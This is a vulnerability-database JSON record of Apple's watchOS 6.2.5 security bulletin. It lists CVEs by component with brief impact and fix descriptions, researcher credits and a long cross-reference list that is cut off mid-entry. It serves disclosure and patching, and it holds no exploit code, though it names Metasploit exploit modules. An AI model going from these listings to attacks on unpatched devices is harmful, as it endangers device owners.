DATABASE RESOURCES PRICING ABOUT US

{"id": "APPLE:HT211175", "bulletinFamily": "software", "title": "About the security content of watchOS 6.2.5 - Apple Support", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## watchOS 6.2.5\n\nReleased May 18, 2020\n\n**Accounts**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved input validation.\n\nCVE-2020-9827: Jannik Lorenz of SEEMOO @ TU Darmstadt\n\n**AppleMobileFileIntegrity**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application could interact with system processes to access private information and perform privileged actions\n\nDescription: An entitlement parsing issue was addressed with improved parsing.\n\nCVE-2020-9842: Linus Henze (pinauten.de)\n\n**Audio**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9815: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**Audio**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9791: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**CoreText**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2020-9829: Aaron Perris (@aaronp613), an anonymous researcher, an anonymous researcher, Carlos S Tech, Sam Menzies of Sam\u2019s Lounge, Sufiyan Gouri of Lovely Professional University, India, Suleman Hasan Rathor of Arabic-Classroom.com\n\n**FontParser**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9816: Peter Nguyen Vu Hoang of STAR Labs working with Trend Micro Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9821: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to determine another application's memory layout\n\nDescription: An information disclosure issue was addressed by removing the vulnerable code.\n\nCVE-2020-9797: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2020-9852: Tao Huang and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-9795: Zhuo Liang of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9808: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9811: Tielei Wang of Pangu Lab\n\nCVE-2020-9812: derrek (@derrekr6)\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n\nCVE-2020-9813: Xinru Chi of Pangu Lab\n\nCVE-2020-9814: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9809: Benjamin Randazzo (@____benjamin)\n\n**libxpc**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to overwrite arbitrary files\n\nDescription: A path handling issue was addressed with improved validation.\n\nCVE-2020-9994: Apple\n\nEntry added September 21, 2020\n\n**Mail**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted mail message may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2020-9819: ZecOps.com\n\n**Mail**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9818: ZecOps.com\n\n**rsync**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A remote attacker may be able to overwrite existing files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2014-9512: gaojianfeng\n\nEntry added July 28, 2020\n\n**SQLite**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**System Preferences**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with improved state handling.\n\nCVE-2020-9839: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebRTC**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2019-20503: Natalie Silvanovich of Google Project Zero\n\n\n\n## Additional recognition\n\n**CoreText**\n\nWe would like to acknowledge Jiska Classen (@naehrdine) and Dennis Heinze (@ttdennis) of Secure Mobile Networking Lab for their assistance.\n\n**ImageIO**\n\nWe would like to acknowledge Lei Sun for their assistance.\n\n**IOHIDFamily**\n\nWe would like to acknowledge Andy Davis of NCC Group for their assistance.\n\n**Kernel**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Luke Walker of Manchester Metropolitan University for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n", "published": "2020-09-21T04:34:00", "modified": "2020-09-21T04:34:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://support.apple.com/kb/HT211175", "reporter": "Apple", "references": [], "cvelist": ["CVE-2020-9827", "CVE-2014-9512", "CVE-2020-9791", "CVE-2020-9803", "CVE-2020-9819", "CVE-2020-9852", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9812", "CVE-2020-3878", "CVE-2020-9839", "CVE-2020-9795", "CVE-2020-9813", "CVE-2020-9821", "CVE-2020-9802", "CVE-2020-9809", "CVE-2020-9800", "CVE-2020-9842", "CVE-2020-9815", "CVE-2020-9790", "CVE-2020-9850", "CVE-2020-9829", "CVE-2020-9807", "CVE-2020-9808", "CVE-2020-9811", "CVE-2020-9843", "CVE-2020-9814", "CVE-2020-9816", "CVE-2020-9789", "CVE-2020-9797", "CVE-2020-9794", "CVE-2020-9994", "CVE-2019-20503", "CVE-2020-9818"], "type": "apple", "lastseen": "2020-12-24T20:44:01", "edition": 7, "viewCount": 89, "enchantments": {"dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2020:4451"]}, {"type": "amazon", "idList": ["ALAS2-2020-1414"]}, {"type": "apple", "idList": ["APPLE:2D778DC3A51D07FD2EE75D0D87598CAB", "APPLE:3D7765FAAA5588336144E1B60D0B775E", "APPLE:57687011D0766424B56EB268957F8A8B", "APPLE:5D039C4531D6A51FF20C1C65087E31DF", "APPLE:5F5EC06D7439A214533E313BF66E84F0", "APPLE:664BB2884C7D375FC11AD8C7123D5CCD", "APPLE:7896F4A93FD5FD018CC9D732F6694D33", "APPLE:9CAF885CB18F659BDEB0CAC7F6570924", "APPLE:AA327FA1C4CF3105C8CBED9D78735E12", "APPLE:AA9B80D4202B0773A6E30EECAE778C28", "APPLE:AF34F6EF09549EDA58BB0A4D84F25C02", "APPLE:B4A51DEE7A0FB4F7EC28603D8D3C11F4", "APPLE:B891E6B961A423A3FA7E0836C2B1370D", "APPLE:BC67DF8DBD817484CD025371218D2504", "APPLE:CF9C08BD8DDC6A4A1E0D3912347422D3", "APPLE:D7732CBB7EC3F59A83A8A74E674D8D67", "APPLE:HT210918", "APPLE:HT210919", "APPLE:HT210920", "APPLE:HT210921", "APPLE:HT211100", "APPLE:HT211168", "APPLE:HT211169", "APPLE:HT211170", "APPLE:HT211171", "APPLE:HT211176", "APPLE:HT211177", "APPLE:HT211178", "APPLE:HT211179", "APPLE:HT211181", "APPLE:HT211289"]}, {"type": "archlinux", "idList": ["ASA-202003-11", "ASA-202003-12", "ASA-202003-8", "ASA-202007-1"]}, {"type": "attackerkb", "idList": ["AKB:2D39FC31-C85A-47F1-BF8F-C7D3AB8A5505", "AKB:A25051FF-1873-416F-9BC1-2871081CF0D1", "AKB:BC51026B-2BE3-44B4-BB8E-2FEAC9CE2DE6"]}, {"type": "centos", "idList": ["CESA-2020:0815", "CESA-2020:0816", "CESA-2020:0905", "CESA-2020:0914"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-3251"]}, {"type": "chrome", "idList": ["GCSA-8282831935215056814"]}, {"type": "cve", "idList": ["CVE-2014-9512", "CVE-2019-20503", "CVE-2020-3878", "CVE-2020-9789", "CVE-2020-9790", "CVE-2020-9791", "CVE-2020-9794", "CVE-2020-9795", "CVE-2020-9797", "CVE-2020-9800", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9808", "CVE-2020-9809", "CVE-2020-9811", "CVE-2020-9812", "CVE-2020-9813", "CVE-2020-9814", "CVE-2020-9815", "CVE-2020-9816", "CVE-2020-9818", "CVE-2020-9819", "CVE-2020-9821", "CVE-2020-9827", "CVE-2020-9829", "CVE-2020-9839", "CVE-2020-9842", "CVE-2020-9843", "CVE-2020-9850", "CVE-2020-9852", "CVE-2020-9994"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2140-1:5D8C5", "DEBIAN:DLA-2140-1:F888A", "DEBIAN:DLA-2150-1:241FE", "DEBIAN:DLA-2150-1:E1996", "DEBIAN:DSA-4639-1:5B2A2", "DEBIAN:DSA-4642-1:A17EA", "DEBIAN:DSA-4645-1:37425", "DEBIAN:DSA-4645-1:EF8A7", "DEBIAN:DSA-4724-1:6BA8A"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-9512", "DEBIANCVE:CVE-2019-20503", "DEBIANCVE:CVE-2020-9802", "DEBIANCVE:CVE-2020-9803", "DEBIANCVE:CVE-2020-9805", "DEBIANCVE:CVE-2020-9806", "DEBIANCVE:CVE-2020-9807", "DEBIANCVE:CVE-2020-9843", "DEBIANCVE:CVE-2020-9850"]}, {"type": "fedora", "idList": ["FEDORA:1B1A130A014E", "FEDORA:5115F6476350", "FEDORA:6395E630FBA4", "FEDORA:88D00607A3C9", "FEDORA:C9F1930D42C8"]}, {"type": "freebsd", "idList": ["08FBA28B-6F9F-11EA-BD0B-001B217B3468", "EFD03116-C2A9-11EA-82BC-B42E99A1B9C3"]}, {"type": "gentoo", "idList": ["GLSA-201605-04", "GLSA-202003-02", "GLSA-202003-10", "GLSA-202007-11"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:37BA7BA880E3167EF2FF653967274013", "GOOGLEPROJECTZERO:82BC34EA810EB3C377CA67B9E6698CC2", "GOOGLEPROJECTZERO:8D97E6A853D0492A3F60FD23D695FB73", "GOOGLEPROJECTZERO:91800FF4B3B97E581EBEE3342DED86A5"]}, {"type": "kaspersky", "idList": ["KLA11688", "KLA11691", "KLA11701", "KLA11702", "KLA11724", "KLA11790", "KLA11791"]}, {"type": "mageia", "idList": ["MGASA-2020-0141", "MGASA-2020-0142", "MGASA-2020-0149", "MGASA-2020-0317"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-OSX-BROWSER-SAFARI_IN_OPERATOR_SIDE_EFFECT-", "MSF:EXPLOIT-OSX-LOCAL-CFPREFSD_RACE_CONDITION-"]}, {"type": "mozilla", "idList": ["MFSA2020-08", "MFSA2020-09", "MFSA2020-10"]}, {"type": "mscve", "idList": ["MS:ADV200002"]}, {"type": "nessus", "idList": ["AL2_ALAS-2020-1414.NASL", "ALMA_LINUX_ALSA-2020-4451.NASL", "APPLETV_13_3_1.NASL", "APPLE_IOS_1247_CHECK.NBIN", "APPLE_IOS_1331_CHECK.NBIN", "APPLE_IOS_135_CHECK.NBIN", "CENTOS8_RHSA-2020-0820.NASL", "CENTOS8_RHSA-2020-0919.NASL", "CENTOS8_RHSA-2020-4451.NASL", "CENTOS_RHSA-2020-0815.NASL", "CENTOS_RHSA-2020-0816.NASL", "CENTOS_RHSA-2020-0905.NASL", "CENTOS_RHSA-2020-0914.NASL", "DEBIAN_DLA-2140.NASL", "DEBIAN_DLA-2150.NASL", "DEBIAN_DSA-4639.NASL", "DEBIAN_DSA-4642.NASL", "DEBIAN_DSA-4645.NASL", "DEBIAN_DSA-4724.NASL", "EULEROS_SA-2021-1844.NASL", "EULEROS_SA-2021-2444.NASL", "FEDORA_2020-39E0B8BD14.NASL", "FEDORA_2020-7FD051B378.NASL", "FEDORA_2020-AB074C6CDF.NASL", "FEDORA_2020-D2736EE493.NASL", "FREEBSD_PKG_08FBA28B6F9F11EABD0B001B217B3468.NASL", "FREEBSD_PKG_EFD03116C2A911EA82BCB42E99A1B9C3.NASL", "GENTOO_GLSA-201605-04.NASL", "GENTOO_GLSA-202003-02.NASL", "GENTOO_GLSA-202003-10.NASL", "GENTOO_GLSA-202007-11.NASL", "GOOGLE_CHROME_80_0_3987_149.NASL", "MACOSX_GOOGLE_CHROME_80_0_3987_149.NASL", "MACOS_FIREFOX_68_6_ESR.NASL", "MACOS_FIREFOX_74_0.NASL", "MACOS_HT210919.NASL", "MACOS_HT211170.NASL", "MACOS_HT211289.NASL", "MICROSOFT_EDGE_CHROMIUM_80_0_361_69.NASL", "MOZILLA_FIREFOX_68_6_ESR.NASL", "MOZILLA_FIREFOX_74_0.NASL", "NEWSTART_CGSL_NS-SA-2020-0039_FIREFOX.NASL", "NEWSTART_CGSL_NS-SA-2020-0042_THUNDERBIRD.NASL", "NEWSTART_CGSL_NS-SA-2020-0046_THUNDERBIRD.NASL", "NEWSTART_CGSL_NS-SA-2020-0047_FIREFOX.NASL", "NEWSTART_CGSL_NS-SA-2020-0093_THUNDERBIRD.NASL", "NEWSTART_CGSL_NS-SA-2020-0097_FIREFOX.NASL", "NEWSTART_CGSL_NS-SA-2021-0002_THUNDERBIRD.NASL", "NEWSTART_CGSL_NS-SA-2021-0004_FIREFOX.NASL", "NEWSTART_CGSL_NS-SA-2021-0059_WEBKIT2GTK3.NASL", "OPENSUSE-2015-124.NASL", "OPENSUSE-2016-764.NASL", "OPENSUSE-2016-803.NASL", "OPENSUSE-2018-34.NASL", "OPENSUSE-2020-1064.NASL", "OPENSUSE-2020-340.NASL", "OPENSUSE-2020-365.NASL", "OPENSUSE-2020-366.NASL", "OPENSUSE-2022-0182-1.NASL", "ORACLELINUX_ELSA-2020-0815.NASL", "ORACLELINUX_ELSA-2020-0905.NASL", "ORACLELINUX_ELSA-2020-0919.NASL", "ORACLELINUX_ELSA-2020-4451.NASL", "REDHAT-RHSA-2020-0815.NASL", "REDHAT-RHSA-2020-0816.NASL", "REDHAT-RHSA-2020-0819.NASL", "REDHAT-RHSA-2020-0820.NASL", "REDHAT-RHSA-2020-0905.NASL", "REDHAT-RHSA-2020-0914.NASL", "REDHAT-RHSA-2020-0918.NASL", "REDHAT-RHSA-2020-0919.NASL", "REDHAT-RHSA-2020-1270.NASL", "REDHAT-RHSA-2020-4451.NASL", "SLACKWARE_SSA_2020-070-01.NASL", "SLACKWARE_SSA_2020-073-01.NASL", "SL_20200316_FIREFOX_ON_SL6_X.NASL", "SL_20200316_FIREFOX_ON_SL7_X.NASL", "SL_20200319_THUNDERBIRD_ON_SL7_X.NASL", "SL_20200323_THUNDERBIRD_ON_SL6_X.NASL", "SUSE_SU-2016-0173-1.NASL", "SUSE_SU-2016-0176-1.NASL", "SUSE_SU-2016-1866-1.NASL", "SUSE_SU-2016-2151-1.NASL", "SUSE_SU-2020-0686-1.NASL", "SUSE_SU-2020-0717-1.NASL", "SUSE_SU-2020-14312-1.NASL", "SUSE_SU-2020-1990-1.NASL", "SUSE_SU-2020-1992-1.NASL", "SUSE_SU-2020-2069-1.NASL", "SUSE_SU-2022-0142-1.NASL", "SUSE_SU-2022-0182-1.NASL", "SUSE_SU-2022-0182-2.NASL", "SUSE_SU-2022-0183-1.NASL", "UBUNTU_USN-2879-1.NASL", "UBUNTU_USN-4299-1.NASL", "UBUNTU_USN-4328-1.NASL", "UBUNTU_USN-4335-1.NASL", "UBUNTU_USN-4422-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704639", "OPENVAS:1361412562310704642", "OPENVAS:1361412562310704645", "OPENVAS:1361412562310704724", "OPENVAS:1361412562310816617", "OPENVAS:1361412562310816700", "OPENVAS:1361412562310816701", "OPENVAS:1361412562310816702", "OPENVAS:1361412562310816703", "OPENVAS:1361412562310816705", "OPENVAS:1361412562310816706", "OPENVAS:1361412562310816710", "OPENVAS:1361412562310816711", "OPENVAS:1361412562310816712", "OPENVAS:1361412562310817028", "OPENVAS:1361412562310817029", "OPENVAS:1361412562310817030", "OPENVAS:1361412562310817130", "OPENVAS:1361412562310817131", "OPENVAS:1361412562310817133", "OPENVAS:1361412562310842614", "OPENVAS:1361412562310844361", "OPENVAS:1361412562310844392", "OPENVAS:1361412562310844399", "OPENVAS:1361412562310853069", "OPENVAS:1361412562310853076", "OPENVAS:1361412562310853077", "OPENVAS:1361412562310877603", "OPENVAS:1361412562310877627", "OPENVAS:1361412562310877632", "OPENVAS:1361412562310883201", "OPENVAS:1361412562310883203", "OPENVAS:1361412562310883213", "OPENVAS:1361412562310883214", "OPENVAS:1361412562310892140", "OPENVAS:1361412562310892150"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0815", "ELSA-2020-0816", "ELSA-2020-0820", "ELSA-2020-0905", "ELSA-2020-0914", "ELSA-2020-0919", "ELSA-2020-4451"]}, {"type": "osv", "idList": ["OSV:DLA-2140-1", "OSV:DLA-2150-1", "OSV:DSA-4639-1", "OSV:DSA-4642-1", "OSV:DSA-4645-1", "OSV:DSA-4724-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157926", "PACKETSTORM:159084", "PACKETSTORM:159447"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A"]}, {"type": "redhat", "idList": ["RHSA-2020:0815", "RHSA-2020:0816", "RHSA-2020:0819", "RHSA-2020:0820", "RHSA-2020:0905", "RHSA-2020:0914", "RHSA-2020:0918", "RHSA-2020:0919", "RHSA-2020:1270", "RHSA-2020:4451", "RHSA-2020:5605", "RHSA-2020:5633", "RHSA-2020:5635", "RHSA-2021:0050", "RHSA-2021:0190", "RHSA-2021:0436", "RHSA-2021:0799", "RHSA-2022:0056", "RHSA-2022:5924"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-20503", "RH:CVE-2020-9802", "RH:CVE-2020-9803", "RH:CVE-2020-9805", "RH:CVE-2020-9806", "RH:CVE-2020-9807", "RH:CVE-2020-9843", "RH:CVE-2020-9850"]}, {"type": "slackware", "idList": ["SSA-2020-070-01", "SSA-2020-073-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0340-1", "OPENSUSE-SU-2020:0365-1", "OPENSUSE-SU-2020:0366-1", "OPENSUSE-SU-2020:0389-1", "OPENSUSE-SU-2020:1064-1", "OPENSUSE-SU-2022:0182-1", "OPENSUSE-SU-2022:0182-2"]}, {"type": "threatpost", "idList": ["THREATPOST:ABBA6B89522F29EE1F01F3D010F46FC0"]}, {"type": "ubuntu", "idList": ["USN-2879-1", "USN-4299-1", "USN-4328-1", "USN-4335-1", "USN-4422-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-9512", "UB:CVE-2019-20503", "UB:CVE-2020-9794", "UB:CVE-2020-9802", "UB:CVE-2020-9803", "UB:CVE-2020-9805", "UB:CVE-2020-9806", "UB:CVE-2020-9807", "UB:CVE-2020-9843", "UB:CVE-2020-9850"]}, {"type": "veracode", "idList": ["VERACODE:26054", "VERACODE:26056", "VERACODE:26057", "VERACODE:26058", "VERACODE:26059", "VERACODE:26093", "VERACODE:26096", "VERACODE:26099", "VERACODE:29607"]}, {"type": "zdi", "idList": ["ZDI-20-671", "ZDI-20-672", "ZDI-20-673", "ZDI-20-674", "ZDI-20-681", "ZDI-20-682", "ZDI-20-823"]}, {"type": "zdt", "idList": ["1337DAY-ID-34510", "1337DAY-ID-34914", "1337DAY-ID-34995"]}]}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "almalinux", "idList": ["ALSA-2020:4451"]}, {"type": "amazon", "idList": ["ALAS2-2020-1414"]}, {"type": "apple", "idList": ["APPLE:2D778DC3A51D07FD2EE75D0D87598CAB", "APPLE:57687011D0766424B56EB268957F8A8B", "APPLE:5D039C4531D6A51FF20C1C65087E31DF", "APPLE:5F5EC06D7439A214533E313BF66E84F0", "APPLE:664BB2884C7D375FC11AD8C7123D5CCD", "APPLE:7896F4A93FD5FD018CC9D732F6694D33", "APPLE:9CAF885CB18F659BDEB0CAC7F6570924", "APPLE:AA327FA1C4CF3105C8CBED9D78735E12", "APPLE:AA9B80D4202B0773A6E30EECAE778C28", "APPLE:AF34F6EF09549EDA58BB0A4D84F25C02", "APPLE:B891E6B961A423A3FA7E0836C2B1370D", "APPLE:BC67DF8DBD817484CD025371218D2504", "APPLE:CF9C08BD8DDC6A4A1E0D3912347422D3", "APPLE:D7732CBB7EC3F59A83A8A74E674D8D67", "APPLE:HT210918", "APPLE:HT210919", "APPLE:HT210920", "APPLE:HT210921", "APPLE:HT211100", "APPLE:HT211169", "APPLE:HT211176", "APPLE:HT211177", "APPLE:HT211178", "APPLE:HT211179", "APPLE:HT211181"]}, {"type": "archlinux", "idList": ["ASA-202003-11", "ASA-202003-12", "ASA-202003-8", "ASA-202007-1"]}, {"type": "attackerkb", "idList": ["AKB:BC51026B-2BE3-44B4-BB8E-2FEAC9CE2DE6"]}, {"type": "canvas", "idList": ["RSYNC"]}, {"type": "centos", "idList": ["CESA-2020:0815", "CESA-2020:0816", "CESA-2020:0905", "CESA-2020:0914"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-3251"]}, {"type": "chrome", "idList": ["GCSA-8282831935215056814"]}, {"type": "cve", "idList": ["CVE-2014-9512", "CVE-2019-20044", "CVE-2019-20503", "CVE-2020-3878", "CVE-2020-9789", "CVE-2020-9790", "CVE-2020-9791", "CVE-2020-9794", "CVE-2020-9795", "CVE-2020-9797", "CVE-2020-9800", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9808", "CVE-2020-9809", "CVE-2020-9811", "CVE-2020-9812", "CVE-2020-9813", "CVE-2020-9814", "CVE-2020-9815", "CVE-2020-9816", "CVE-2020-9818", "CVE-2020-9819", "CVE-2020-9821", "CVE-2020-9827", "CVE-2020-9829", "CVE-2020-9839", "CVE-2020-9842", "CVE-2020-9843", "CVE-2020-9850", "CVE-2020-9852"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2140-1:F888A", "DEBIAN:DLA-2150-1:241FE", "DEBIAN:DSA-4639-1:5B2A2", "DEBIAN:DSA-4642-1:A17EA", "DEBIAN:DSA-4645-1:EF8A7"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-20503"]}, {"type": "fedora", "idList": ["FEDORA:1B1A130A014E", "FEDORA:5115F6476350", "FEDORA:6395E630FBA4", "FEDORA:88D00607A3C9", "FEDORA:C9F1930D42C8"]}, {"type": "freebsd", "idList": ["08FBA28B-6F9F-11EA-BD0B-001B217B3468"]}, {"type": "gentoo", "idList": ["GLSA-202003-02", "GLSA-202003-10"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:37BA7BA880E3167EF2FF653967274013", "GOOGLEPROJECTZERO:82BC34EA810EB3C377CA67B9E6698CC2", "GOOGLEPROJECTZERO:8D97E6A853D0492A3F60FD23D695FB73", "GOOGLEPROJECTZERO:91800FF4B3B97E581EBEE3342DED86A5"]}, {"type": "kaspersky", "idList": ["KLA11688", "KLA11691", "KLA11701", "KLA11702", "KLA11724", "KLA11790", "KLA11791"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/OSX/BROWSER/SAFARI_IN_OPERATOR_SIDE_EFFECT"]}, {"type": "mozilla", "idList": ["MFSA2020-09"]}, {"type": "mscve", "idList": ["MS:ADV200002"]}, {"type": "nessus", "idList": ["AL2_ALAS-2020-1414.NASL", "APPLETV_13_3_1.NASL", "CENTOS_RHSA-2020-0815.NASL", "CENTOS_RHSA-2020-0816.NASL", "CENTOS_RHSA-2020-0905.NASL", "CENTOS_RHSA-2020-0914.NASL", "DEBIAN_DLA-2140.NASL", "DEBIAN_DLA-2150.NASL", "DEBIAN_DSA-4639.NASL", "DEBIAN_DSA-4642.NASL", "DEBIAN_DSA-4645.NASL", "FEDORA_2020-39E0B8BD14.NASL", "FEDORA_2020-7FD051B378.NASL", "FREEBSD_PKG_08FBA28B6F9F11EABD0B001B217B3468.NASL", "FREEBSD_PKG_EFD03116C2A911EA82BCB42E99A1B9C3.NASL", "GENTOO_GLSA-202003-02.NASL", "GENTOO_GLSA-202003-10.NASL", "GOOGLE_CHROME_80_0_3987_149.NASL", "MACOSX_GOOGLE_CHROME_80_0_3987_149.NASL", "MACOS_FIREFOX_68_6_ESR.NASL", "MACOS_FIREFOX_74_0.NASL", "MACOS_HT210919.NASL", "MACOS_HT211170.NASL", "MOZILLA_FIREFOX_68_6_ESR.NASL", "MOZILLA_FIREFOX_74_0.NASL", "NEWSTART_CGSL_NS-SA-2020-0093_THUNDERBIRD.NASL", "NEWSTART_CGSL_NS-SA-2020-0097_FIREFOX.NASL", "OPENSUSE-2020-340.NASL", "OPENSUSE-2020-365.NASL", "OPENSUSE-2020-366.NASL", "ORACLELINUX_ELSA-2020-0815.NASL", "ORACLELINUX_ELSA-2020-0905.NASL", "ORACLELINUX_ELSA-2020-0919.NASL", "ORACLELINUX_ELSA-2020-4451.NASL", "REDHAT-RHSA-2020-0815.NASL", "REDHAT-RHSA-2020-0816.NASL", 